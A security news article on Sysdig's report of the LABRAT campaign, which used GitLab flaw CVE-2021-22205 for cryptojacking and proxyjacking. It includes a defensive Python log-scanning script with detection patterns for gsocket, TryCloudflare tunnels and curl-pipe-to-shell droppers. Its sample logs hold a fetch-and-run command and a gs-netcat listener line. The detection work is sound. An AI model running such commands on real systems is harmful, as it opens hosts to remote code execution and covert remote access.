Hackers trade in crypto- and proxyjacking as part of Operation LABRAT

Cybercriminals have compromised numerous hosts through a two-year-old vulnerability.

Sysdig reported yesterday that its specialists recently uncovered a new financially motivated operation called LABRAT, in which attackers exploited a two-year-old critical GitLab vulnerability for cryptojacking and proxyjacking.

"The hackers used signature-based tools, sophisticated and stealthy malware, command and control tools that bypassed firewalls, and kernel-based rootkits to hide their presence," the researchers said.

Proxyjacking allows an attacker to rent a compromised host to a proxy network in order to monetize unused bandwidth. Cryptojacking involves using system resources to mine cryptocurrency.

A distinctive feature of the campaign is the use of compiled Go and .NET binaries to bypass detection systems. LABRAT also functions as a backdoor on infected systems, which can pave the way for subsequent attacks, data theft and ransomware.

The attack begins by exploiting the critical vulnerability CVE-2021-22205, which has a CVSS score of 10. As the identifier indicates, it was discovered in 2021 and was soon fixed by GitLab. However, some developers still have not updated their copies of the software, becoming new victims of the hackers.

Successful penetration is followed by retrieval of a dropper script from the C2 server. The dropper establishes persistence on the target system, moves laterally using the SSH credentials it finds there, and downloads additional binaries from a private GitLab repository.

The TryCloudflare service is also a key element of the operation: it is used to set up covert communication channels from compromised hosts.

Some of the payloads used in this campaign include the "gsocket" utility for remote access, as well as binaries for cryptojacking and proxyjacking through the well-known IPRoyal and ProxyLite services. The mining process is hidden using the "hiding-cryptominers-linux-rootkit" kernel rootkit.
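The attack chain above (dropper pulled from a C2, TryCloudflare tunnels, the gsocket remote-access utility and the cryptominer-hiding kernel rootkit) leaves traces in ordinary host and egress logs. The following script is an added example of how a defender might sweep such logs for those traces; it is not Sysdig's tooling or anything published by the article. The log lines are constructed, `gs-netcat` is assumed to be the gsocket client binary name, and the rootkit's on-disk module name is assumed to contain the string `hiding_cryptominers`.

```python
"""Sweep host/egress log lines for indicators matching the LABRAT chain.

Added example: not Sysdig's tooling. All sample log lines are constructed,
and the assumptions behind each rule are noted in its comment.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str   # name of the rule that fired
    line: str   # the log line it fired on


# (rule name, pattern). Each pattern is applied case-insensitively.
RULES = [
    # TryCloudflare quick tunnels are reachable under *.trycloudflare.com, so
    # any outbound DNS or HTTP to that suffix from a server is worth a look.
    ("trycloudflare_egress",
     re.compile(r"\b[\w-]+\.trycloudflare\.com\b", re.I)),
    # gsocket's relay client is assumed to run as gs-netcat (assumed name).
    ("gsocket_process",
     re.compile(r"\b(gs-netcat|gsocket)\b", re.I)),
    # The article names the hiding-cryptominers-linux-rootkit; the loaded
    # module name is assumed to contain this fragment (hyphen or underscore).
    ("cryptominer_rootkit_module",
     re.compile(r"hiding[-_]?cryptominers", re.I)),
    # Generic dropper behaviour: a remote script fetched and piped into a shell.
    ("remote_script_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", re.I)),
]


def scan(lines):
    """Return a Finding for every (line, rule) pair that matches."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(name, line))
    return findings


def summarize(findings):
    """Count findings per rule so a triage view is one dict, not a wall of lines."""
    counts = {}
    for finding in findings:
        counts[finding.rule] = counts.get(finding.rule, 0) + 1
    return counts


# Constructed sample: two benign lines mixed with four that match the chain.
# 203.0.113.10 is a documentation address, not a real C2.
SAMPLE_LOGS = [
    '2023-08-17T10:01:02Z web01 execve uid=0 cmd="apt-get update"',
    '2023-08-17T10:02:11Z web01 execve uid=998 cmd="curl -fsSL http://203.0.113.10/d.sh | sh"',
    "2023-08-17T10:02:15Z web01 dns q=random-words-here.trycloudflare.com type=A",
    '2023-08-17T10:02:20Z web01 execve uid=998 cmd="/tmp/.x/gs-netcat -s PLACEHOLDER -l"',
    "2023-08-17T10:02:30Z web01 kernel: module hiding_cryptominers_linux_rootkit loaded",
    "2023-08-17T10:05:00Z web01 sshd: Accepted publickey for deploy from 10.0.0.5",
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(f"[{finding.rule}] {finding.line}")
    print(summarize(scan(SAMPLE_LOGS)))
```

Each rule is deliberately narrow and tied to something the article names, so a hit is a starting point for triage rather than proof of compromise; the `remote_script_to_shell` rule in particular will also catch legitimate one-line installers and should be reviewed against the host's expected change activity.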

In short, the attackers quietly exploited an old GitLab vulnerability for financial gain. The company urged users to upgrade their GitLab instances to the latest versions immediately if they have not already done so.